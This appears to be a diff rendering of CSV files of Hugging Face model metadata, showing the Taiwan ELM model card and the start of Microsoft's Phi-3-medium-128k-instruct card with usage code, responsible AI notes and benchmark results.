Taiwan ELM is a family of Efficient LLMs for Taiwan base on [apple/OpenELM](https://huggingface.co/apple/OpenELM).
|
| 239 |
+
The project aims to provide an efficient model for researchers without access to large-scale computing resources.
|
| 240 |
+
|
| 241 |
+
The model is trained using [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory) on 2B Traditional Chinese tokens and 500K instruction samples.
|
| 242 |
+
We will extend the model to train on larger data sets and different base models if there is sufficient demand.
|
| 243 |
+
|
| 244 |
+
## What is being released?
|
| 245 |
+
|
| 246 |
+
We release both pre-trained **base models and instruction tuned variants** with 270M and 1.1B parameters.
|
| 247 |
+
Along with the model, **datasets used to train the models** are also released.
|
| 248 |
+
|
| 249 |
+
In an effort to improve transparency, training **checkpoints (including rng/optimizer state) and logs** are also released in the model page.
|
| 250 |
+
|
| 251 |
+
List of released models:
|
| 252 |
+
* [Taiwan-ELM-270M](https://huggingface.co/liswei/Taiwan-ELM-270M)
|
| 253 |
+
* [Taiwan-ELM-1_1B](https://huggingface.co/liswei/Taiwan-ELM-1_1B)
|
| 254 |
+
* [Taiwan-ELM-270M-Instruct](https://huggingface.co/liswei/Taiwan-ELM-270M-Instruct)
|
| 255 |
+
* [Taiwan-ELM-1_1B-Instruct](https://huggingface.co/liswei/Taiwan-ELM-1_1B-Instruct)
|
| 256 |
+
|
| 257 |
+
List of released datasets:
|
| 258 |
+
* [liswei/Taiwan-Text-Excellence-2B](https://huggingface.co/datasets/liswei/Taiwan-Text-Excellence-2B)
|
| 259 |
+
* [liswei/PromptPair-TW](https://huggingface.co/datasets/liswei/PromptPair-TW)
|
| 260 |
+
* [liswei/wikinews-zhtw-dedup](https://huggingface.co/datasets/liswei/wikinews-zhtw-dedup)
|
| 261 |
+
* [liswei/wikipedia-zhtw-dedup](https://huggingface.co/datasets/liswei/wikipedia-zhtw-dedup)
|
| 262 |
+
* [liswei/coct-en-zhtw-dedup](https://huggingface.co/datasets/liswei/coct-en-zhtw-dedup)
|
| 263 |
+
|
| 264 |
+
Some of the datasets are not used for training Taiwan ELM but also released:
|
| 265 |
+
* [liswei/common-crawl-zhtw](https://huggingface.co/datasets/liswei/common-crawl-zhtw)
|
| 266 |
+
* [liswei/c4-zhtw](https://huggingface.co/datasets/liswei/c4-zhtw)
|
| 267 |
+
* [liswei/rm-static-zhTW](https://huggingface.co/datasets/liswei/rm-static-zhTW)
|
| 268 |
+
|
| 269 |
+
## Usage Examples
|
| 270 |
+
|
| 271 |
+
For instruction-tuned modesl, we adapt the [LLaMA2](https://huggingface.co/meta-llama/Llama-2-7b-chat-hf) template:
|
| 272 |
+
```jinja2
|
| 273 |
+
<s>[INST] <<SYS>>
|
| 274 |
+
{{ system_prompt }}
|
| 275 |
+
<</SYS>>
|
| 276 |
+
|
| 277 |
+
{{ user_message }} [/INST]
|
| 278 |
+
```
|
| 279 |
+
|
| 280 |
+
The model could be load via `AutoModelForCausalLM` or `text-generation-inference` with `trust_remote_code=True`:
|
| 281 |
+
```python
|
| 282 |
+
taiwan_elm_270m = AutoModelForCausalLM.from_pretrained(""liswei/Taiwan-ELM-270M"", trust_remote_code=True)
|
| 283 |
+
```
|
| 284 |
+
|
| 285 |
+
We also support additional generation methods and speculative generation, please find reference at [OpenELM#usage](https://huggingface.co/apple/OpenELM#usage).","{""id"": ""liswei/Taiwan-ELM"", ""author"": ""liswei"", ""sha"": ""5c08aa79a15ceb6d0558cd2a0c2890f158470686"", ""last_modified"": ""2024-06-02 07:45:01+00:00"", ""created_at"": ""2024-06-02 06:47:44+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""zh"", ""dataset:liswei/Taiwan-Text-Excellence-2B"", ""dataset:liswei/PromptPair-TW"", ""dataset:yentinglin/TaiwanChat"", ""base_model:apple/OpenELM"", ""base_model:finetune:apple/OpenELM"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: apple/OpenELM\ndatasets:\n- liswei/Taiwan-Text-Excellence-2B\n- liswei/PromptPair-TW\n- yentinglin/TaiwanChat\nlanguage:\n- zh\nlicense: apache-2.0"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='TTE Logo.jpeg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Taiwan ELM Logo.jpeg', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-06-02 07:45:01+00:00"", ""cardData"": ""base_model: apple/OpenELM\ndatasets:\n- liswei/Taiwan-Text-Excellence-2B\n- liswei/PromptPair-TW\n- yentinglin/TaiwanChat\nlanguage:\n- zh\nlicense: apache-2.0"", ""transformersInfo"": null, ""_id"": ""665c1590d892e3815d9d1e3f"", ""modelId"": ""liswei/Taiwan-ELM"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=liswei/Taiwan-ELM&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bliswei%2FTaiwan-ELM%5D(%2Fliswei%2FTaiwan-ELM)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 286 |
+
https://huggingface.co/cpu4dream/llava-small-OpenELM-AIMv2-0.6B,N/A,N/A,1,,0,,0,,0,,0,,0
|
Phi-3-medium-128k-instruct_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
@@ -0,0 +1,523 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
microsoft/Phi-3-medium-128k-instruct,"---
|
| 3 |
+
license: mit
|
| 4 |
+
license_link: https://huggingface.co/microsoft/Phi-3-medium-128k-instruct/resolve/main/LICENSE
|
| 5 |
+
|
| 6 |
+
language:
|
| 7 |
+
- multilingual
|
| 8 |
+
pipeline_tag: text-generation
|
| 9 |
+
tags:
|
| 10 |
+
- nlp
|
| 11 |
+
- code
|
| 12 |
+
inference:
|
| 13 |
+
parameters:
|
| 14 |
+
temperature: 0.7
|
| 15 |
+
widget:
|
| 16 |
+
- messages:
|
| 17 |
+
- role: user
|
| 18 |
+
content: Can you provide ways to eat combinations of bananas and dragonfruits?
|
| 19 |
+
---
|
| 20 |
+
🎉 **Phi-3.5**: [[mini-instruct]](https://huggingface.co/microsoft/Phi-3.5-mini-instruct); [[MoE-instruct]](https://huggingface.co/microsoft/Phi-3.5-MoE-instruct) ; [[vision-instruct]](https://huggingface.co/microsoft/Phi-3.5-vision-instruct)
|
| 21 |
+
|
| 22 |
+
## Model Summary
|
| 23 |
+
|
| 24 |
+
The Phi-3-Medium-128K-Instruct is a 14B parameters, lightweight, state-of-the-art open model trained with the Phi-3 datasets that includes both synthetic data and the filtered publicly available websites data with a focus on high-quality and reasoning dense properties.
|
| 25 |
+
The model belongs to the Phi-3 family with the Medium version in two variants [4k](https://huggingface.co/microsoft/Phi-3-medium-4k-instruct) and [128K](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct) which is the context length (in tokens) that it can support.
|
| 26 |
+
|
| 27 |
+
The model has underwent a post-training process that incorporates both supervised fine-tuning and direct preference optimization for the instruction following and safety measures.
|
| 28 |
+
When assessed against benchmarks testing common sense, language understanding, math, code, long context and logical reasoning, Phi-3-Medium-128K-Instruct showcased a robust and state-of-the-art performance among models of the same-size and next-size-up.
|
| 29 |
+
|
| 30 |
+
Resources and Technical Documentation:
|
| 31 |
+
|
| 32 |
+
+ [Phi-3 Microsoft Blog](https://aka.ms/Phi-3Build2024)
|
| 33 |
+
+ [Phi-3 Technical Report](https://aka.ms/phi3-tech-report)
|
| 34 |
+
+ [Phi-3 on Azure AI Studio](https://aka.ms/phi3-azure-ai)
|
| 35 |
+
+ [Phi-3 Cookbook](https://github.com/microsoft/Phi-3CookBook)
|
| 36 |
+
|
| 37 |
+
| | Short Context | Long Context |
|
| 38 |
+
| ------- | ------------- | ------------ |
|
| 39 |
+
| Mini | 4K [[HF]](https://huggingface.co/microsoft/Phi-3-mini-4k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-mini-4k-instruct-onnx) ; [[GGUF]](https://huggingface.co/microsoft/Phi-3-mini-4k-instruct-gguf) | 128K [[HF]](https://huggingface.co/microsoft/Phi-3-mini-128k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-mini-128k-instruct-onnx)|
|
| 40 |
+
| Small | 8K [[HF]](https://huggingface.co/microsoft/Phi-3-small-8k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-small-8k-instruct-onnx-cuda) | 128K [[HF]](https://huggingface.co/microsoft/Phi-3-small-128k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-small-128k-instruct-onnx-cuda)|
|
| 41 |
+
| Medium | 4K [[HF]](https://huggingface.co/microsoft/Phi-3-medium-4k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-medium-4k-instruct-onnx-cuda) | 128K [[HF]](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct-onnx-cuda)|
|
| 42 |
+
| Vision | | 128K [[HF]](https://huggingface.co/microsoft/Phi-3-vision-128k-instruct) ; [[ONNX]](https://huggingface.co/microsoft/Phi-3-vision-128k-instruct-onnx-cuda)|
|
| 43 |
+
|
| 44 |
+
## Intended Uses
|
| 45 |
+
|
| 46 |
+
**Primary use cases**
|
| 47 |
+
|
| 48 |
+
The model is intended for broad commercial and research use in English. The model provides uses for general purpose AI systems and applications which require :
|
| 49 |
+
|
| 50 |
+
1) Memory/compute constrained environments
|
| 51 |
+
2) Latency bound scenarios
|
| 52 |
+
3) Strong reasoning (especially code, math and logic)
|
| 53 |
+
|
| 54 |
+
Our model is designed to accelerate research on language and multimodal models, for use as a building block for generative AI powered features.
|
| 55 |
+
|
| 56 |
+
**Use case considerations**
|
| 57 |
+
|
| 58 |
+
Our models are not specifically designed or evaluated for all downstream purposes. Developers should consider common limitations of language models as they select use cases, and evaluate and mitigate for accuracy, safety, and fariness before using within a specific downstream use case, particularly for high risk scenarios. Developers should be aware of and adhere to applicable laws or regulations (including privacy, trade compliance laws, etc.) that are relevant to their use case.
|
| 59 |
+
|
| 60 |
+
Nothing contained in this Model Card should be interpreted as or deemed a restriction or modification to the license the model is released under.
|
| 61 |
+
|
| 62 |
+
## How to Use
|
| 63 |
+
|
| 64 |
+
Phi-3-Medium-128k-Instruct has been integrated in the development version (4.40.2) of `transformers`. Until the official version is released through `pip`, ensure that you are doing one of the following:
|
| 65 |
+
* When loading the model, ensure that `trust_remote_code=True` is passed as an argument of the `from_pretrained()` function.
|
| 66 |
+
|
| 67 |
+
* Update your local `transformers` to the development version: `pip uninstall -y transformers && pip install git+https://github.com/huggingface/transformers`. The previous command is an alternative to cloning and installing from the source.
|
| 68 |
+
|
| 69 |
+
The current `transformers` version can be verified with: `pip list | grep transformers`.
|
| 70 |
+
|
| 71 |
+
Phi-3-Medium-128k-Instruct is also available in [Azure AI Studio](https://aka.ms/phi3-azure-ai).
|
| 72 |
+
|
| 73 |
+
### Tokenizer
|
| 74 |
+
|
| 75 |
+
Phi-3-Medium-128k-Instruct supports a vocabulary size of up to `32064` tokens. The [tokenizer files](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct/blob/main/added_tokens.json) already provide placeholder tokens that can be used for downstream fine-tuning, but they can also be extended up to the model's vocabulary size.
|
| 76 |
+
|
| 77 |
+
### Chat Format
|
| 78 |
+
|
| 79 |
+
Given the nature of the training data, the Phi-3-Medium-128k-Instruct model is best suited for prompts using the chat format as follows.
|
| 80 |
+
You can provide the prompt as a question with a generic template as follow:
|
| 81 |
+
```markdown
|
| 82 |
+
<|user|>\nQuestion <|end|>\n<|assistant|>
|
| 83 |
+
```
|
| 84 |
+
For example:
|
| 85 |
+
```markdown
|
| 86 |
+
<|user|>
|
| 87 |
+
How to explain Internet for a medieval knight?<|end|>
|
| 88 |
+
<|assistant|>
|
| 89 |
+
```
|
| 90 |
+
|
| 91 |
+
where the model generates the text after `<|assistant|>` . In case of few-shots prompt, the prompt can be formatted as the following:
|
| 92 |
+
|
| 93 |
+
```markdown
|
| 94 |
+
<|user|>
|
| 95 |
+
I am going to Paris, what should I see?<|end|>
|
| 96 |
+
<|assistant|>
|
| 97 |
+
Paris, the capital of France, is known for its stunning architecture, art museums, historical landmarks, and romantic atmosphere. Here are some of the top attractions to see in Paris:\n\n1. The Eiffel Tower: The iconic Eiffel Tower is one of the most recognizable landmarks in the world and offers breathtaking views of the city.\n2. The Louvre Museum: The Louvre is one of the world's largest and most famous museums, housing an impressive collection of art and artifacts, including the Mona Lisa.\n3. Notre-Dame Cathedral: This beautiful cathedral is one of the most famous landmarks in Paris and is known for its Gothic architecture and stunning stained glass windows.\n\nThese are just a few of the many attractions that Paris has to offer. With so much to see and do, it's no wonder that Paris is one of the most popular tourist destinations in the world.""<|end|>
|
| 98 |
+
<|user|>
|
| 99 |
+
What is so great about #1?<|end|>
|
| 100 |
+
<|assistant|>
|
| 101 |
+
```
|
| 102 |
+
|
| 103 |
+
### Sample inference code
|
| 104 |
+
|
| 105 |
+
This code snippets show how to get quickly started with running the model on a GPU:
|
| 106 |
+
|
| 107 |
+
```python
|
| 108 |
+
import torch
|
| 109 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline
|
| 110 |
+
|
| 111 |
+
torch.random.manual_seed(0)
|
| 112 |
+
model_id = ""microsoft/Phi-3-medium-128k-instruct""
|
| 113 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 114 |
+
model_id,
|
| 115 |
+
device_map=""cuda"",
|
| 116 |
+
torch_dtype=""auto"",
|
| 117 |
+
trust_remote_code=True,
|
| 118 |
+
)
|
| 119 |
+
tokenizer = AutoTokenizer.from_pretrained(model_id)
|
| 120 |
+
|
| 121 |
+
messages = [
|
| 122 |
+
{""role"": ""user"", ""content"": ""Can you provide ways to eat combinations of bananas and dragonfruits?""},
|
| 123 |
+
{""role"": ""assistant"", ""content"": ""Sure! Here are some ways to eat bananas and dragonfruits together: 1. Banana and dragonfruit smoothie: Blend bananas and dragonfruits together with some milk and honey. 2. Banana and dragonfruit salad: Mix sliced bananas and dragonfruits together with some lemon juice and honey.""},
|
| 124 |
+
{""role"": ""user"", ""content"": ""What about solving an 2x + 3 = 7 equation?""},
|
| 125 |
+
]
|
| 126 |
+
|
| 127 |
+
pipe = pipeline(
|
| 128 |
+
""text-generation"",
|
| 129 |
+
model=model,
|
| 130 |
+
tokenizer=tokenizer,
|
| 131 |
+
)
|
| 132 |
+
|
| 133 |
+
generation_args = {
|
| 134 |
+
""max_new_tokens"": 500,
|
| 135 |
+
""return_full_text"": False,
|
| 136 |
+
""temperature"": 0.0,
|
| 137 |
+
""do_sample"": False,
|
| 138 |
+
}
|
| 139 |
+
|
| 140 |
+
output = pipe(messages, **generation_args)
|
| 141 |
+
print(output[0]['generated_text'])
|
| 142 |
+
```
|
| 143 |
+
|
| 144 |
+
*Some applications/frameworks might not include a BOS token (`<s>`) at the start of the conversation. Please ensure that it is included since it provides more reliable results.*
|
| 145 |
+
|
| 146 |
+
## Responsible AI Considerations
|
| 147 |
+
|
| 148 |
+
Like other language models, the Phi series models can potentially behave in ways that are unfair, unreliable, or offensive. Some of the limiting behaviors to be aware of include:
|
| 149 |
+
|
| 150 |
+
+ Quality of Service: the Phi models are trained primarily on English text. Languages other than English will experience worse performance. English language varieties with less representation in the training data might experience worse performance than standard American English.
|
| 151 |
+
+ Representation of Harms & Perpetuation of Stereotypes: These models can over- or under-represent groups of people, erase representation of some groups, or reinforce demeaning or negative stereotypes. Despite safety post-training, these limitations may still be present due to differing levels of representation of different groups or prevalence of examples of negative stereotypes in training data that reflect real-world patterns and societal biases.
|
| 152 |
+
+ Inappropriate or Offensive Content: these models may produce other types of inappropriate or offensive content, which may make it inappropriate to deploy for sensitive contexts without additional mitigations that are specific to the use case.
|
| 153 |
+
+ Information Reliability: Language models can generate nonsensical content or fabricate content that might sound reasonable but is inaccurate or outdated.
|
| 154 |
+
+ Limited Scope for Code: Majority of Phi-3 training data is based in Python and use common packages such as ""typing, math, random, collections, datetime, itertools"". If the model generates Python scripts that utilize other packages or scripts in other languages, we strongly recommend users manually verify all API uses.
|
| 155 |
+
|
| 156 |
+
Developers should apply responsible AI best practices and are responsible for ensuring that a specific use case complies with relevant laws and regulations (e.g. privacy, trade, etc.). Important areas for consideration include:
|
| 157 |
+
|
| 158 |
+
+ Allocation: Models may not be suitable for scenarios that could have consequential impact on legal status or the allocation of resources or life opportunities (ex: housing, employment, credit, etc.) without further assessments and additional debiasing techniques.
|
| 159 |
+
+ High-Risk Scenarios: Developers should assess suitability of using models in high-risk scenarios where unfair, unreliable or offensive outputs might be extremely costly or lead to harm. This includes providing advice in sensitive or expert domains where accuracy and reliability are critical (ex: legal or health advice). Additional safeguards should be implemented at the application level according to the deployment context.
|
| 160 |
+
+ Misinformation: Models may produce inaccurate information. Developers should follow transparency best practices and inform end-users they are interacting with an AI system. At the application level, developers can build feedback mechanisms and pipelines to ground responses in use-case specific, contextual information, a technique known as Retrieval Augmented Generation (RAG).
|
| 161 |
+
+ Generation of Harmful Content: Developers should assess outputs for their context and use available safety classifiers or custom solutions appropriate for their use case.
|
| 162 |
+
+ Misuse: Other forms of misuse such as fraud, spam, or malware production may be possible, and developers should ensure that their applications do not violate applicable laws and regulations.
|
| 163 |
+
|
| 164 |
+
|
| 165 |
+
## Training
|
| 166 |
+
|
| 167 |
+
### Model
|
| 168 |
+
|
| 169 |
+
* Architecture: Phi-3-Medium-128k-Instruct has 14B parameters and is a dense decoder-only Transformer model. The model is fine-tuned with Supervised fine-tuning (SFT) and Direct Preference Optimization (DPO) to ensure alignment with human preferences and safety guidlines.
|
| 170 |
+
* Inputs: Text. It is best suited for prompts using chat format.
|
| 171 |
+
* Context length: 128k tokens
|
| 172 |
+
* GPUs: 512 H100-80G
|
| 173 |
+
* Training time: 42 days
|
| 174 |
+
* Training data: 4.8T tokens
|
| 175 |
+
* Outputs: Generated text in response to the input
|
| 176 |
+
* Dates: Our models were trained between February and April 2024
|
| 177 |
+
* Status: This is a static model trained on an offline dataset with cutoff date October 2023. Future versions of the tuned models may be released as we improve models.
|
| 178 |
+
* Release dates: The model weight is released on May 21, 2024.
|
| 179 |
+
|
| 180 |
+
### Datasets
|
| 181 |
+
|
| 182 |
+
Our training data includes a wide variety of sources, totaling 4.8 trillion tokens (including 10% multilingual), and is a combination of
|
| 183 |
+
1) Publicly available documents filtered rigorously for quality, selected high-quality educational data, and code;
|
| 184 |
+
2) Newly created synthetic, “textbook-like” data for the purpose of teaching math, coding, common sense reasoning, general knowledge of the world (science, daily activities, theory of mind, etc.);
|
| 185 |
+
3) High quality chat format supervised data covering various topics to reflect human preferences on different aspects such as instruct-following, truthfulness, honesty and helpfulness.
|
| 186 |
+
|
| 187 |
+
We are focusing on the quality of data that could potentially improve the reasoning ability for the model, and we filter the publicly available documents to contain the correct level of knowledge. As an example, the result of a game in premier league in a particular day might be good training data for frontier models, but we need to remove such information to leave more model capacity for reasoning for the small size models. More details about data can be found in the [Phi-3 Technical Report](https://aka.ms/phi3-tech-report).
|
| 188 |
+
|
| 189 |
+
## Benchmarks
|
| 190 |
+
|
| 191 |
+
We report the results for Phi-3-Medium-128k-Instruct on standard open-source benchmarks measuring the model's reasoning ability (both common sense reasoning and logical reasoning). We compare to Mixtral-8x22b, Gemini-Pro, Command R+ 104B, Llama-3-70B-Instruct, GPT-3.5-Turbo-1106, and GPT-4-Turbo-1106(Chat).
|
| 192 |
+
|
| 193 |
+
All the reported numbers are produced with the exact same pipeline to ensure that the numbers are comparable. These numbers might differ from other published numbers due to slightly different choices in the evaluation.
|
| 194 |
+
|
| 195 |
+
As is now standard, we use few-shot prompts to evaluate the models, at temperature 0.
|
| 196 |
+
The prompts and number of shots are part of a Microsoft internal tool to evaluate language models, and in particular we did no optimization to the pipeline for Phi-3.
|
| 197 |
+
More specifically, we do not change prompts, pick different few-shot examples, change prompt format, or do any other form of optimization for the model.
|
| 198 |
+
|
| 199 |
+
The number of k–shot examples is listed per-benchmark.
|
| 200 |
+
|
| 201 |
+
|Benchmark|Phi-3-Medium-128k-Instruct<br>14b|Command R+<br>104B|Mixtral<br>8x22B|Llama-3-70B-Instruct|GPT3.5-Turbo<br>version 1106|Gemini<br>Pro|GPT-4-Turbo<br>version 1106 (Chat)|
|
| 202 |
+
|---------|-----------------------|--------|-------------|-------------------|-------------------|----------|------------------------|
|
| 203 |
+
|AGI Eval<br>5-shot|49.7|50.1|54.0|56.9|48.4|49.0|59.6|
|
| 204 |
+
|MMLU<br>5-shot|76.6|73.8|76.2|80.2|71.4|66.7|84.0|
|
| 205 |
+
|BigBench Hard<br>3-shot|77.9|74.1|81.8|80.4|68.3|75.6|87.7|
|
| 206 |
+
|ANLI<br>7-shot|57.3|63.4|65.2|68.3|58.1|64.2|71.7|
|
| 207 |
+
|HellaSwag<br>5-shot|81.6|78.0|79.0|82.6|78.8|76.2|88.3|
|
| 208 |
+
|ARC Challenge<br>10-shot|91.0|86.9|91.3|93.0|87.4|88.3|95.6|
|
| 209 |
+
|ARC Easy<br>10-shot|97.6|95.7|96.9|98.2|96.3|96.1|98.8|
|
| 210 |
+
|BoolQ<br>2-shot|86.5|86.1|82.7|89.1|79.1|86.4|91.3|
|
| 211 |
+
|CommonsenseQA<br>10-shot|82.2|82.0|82.0|84.4|79.6|81.8|86.7|
|
| 212 |
+
|MedQA<br>2-shot|67.6|59.2|67.9|78.5|63.4|58.2|83.7|
|
| 213 |
+
|OpenBookQA<br>10-shot|87.2|86.8|88.6|91.8|86.0|86.4|93.4|
|
| 214 |
+
|PIQA<br>5-shot|87.8|86.4|85.0|85.3|86.6|86.2|90.1|
|
| 215 |
+
|Social IQA<br>5-shot|79.0|75.3|78.2|81.1|68.3|75.4|81.7|
|
| 216 |
+
|TruthfulQA (MC2)<br>10-shot|74.3|57.8|67.4|81.9|67.7|72.6|85.2|
|
| 217 |
+
|WinoGrande<br>5-shot|78.9|77.0|75.3|83.3|68.8|72.2|86.7|
|
| 218 |
+
|TriviaQA<br>5-shot|73.9|82.8|84.5|78.5|85.8|80.2|73.3|
|
| 219 |
+
|GSM8K Chain of Thought<br>8-shot|87.5|78.3|83.8|93.5|78.1|80.4|94.2|
|
| 220 |
+
|HumanEval<br>0-shot|58.5|61.6|39.6|78.7|62.2|64.4|79.9|
|
| 221 |
+
|MBPP<br>3-shot|73.8|68.9|70.7|81.3|77.8|73.2|86.7|
|
| 222 |
+
|Average|77.3|75.0|76.3|82.5|74.3|75.4|85.2|
|
| 223 |
+
|
| 224 |
+
We take a closer look at different categories across 80 public benchmark datasets at the table below:
|
| 225 |
+
|
| 226 |
+
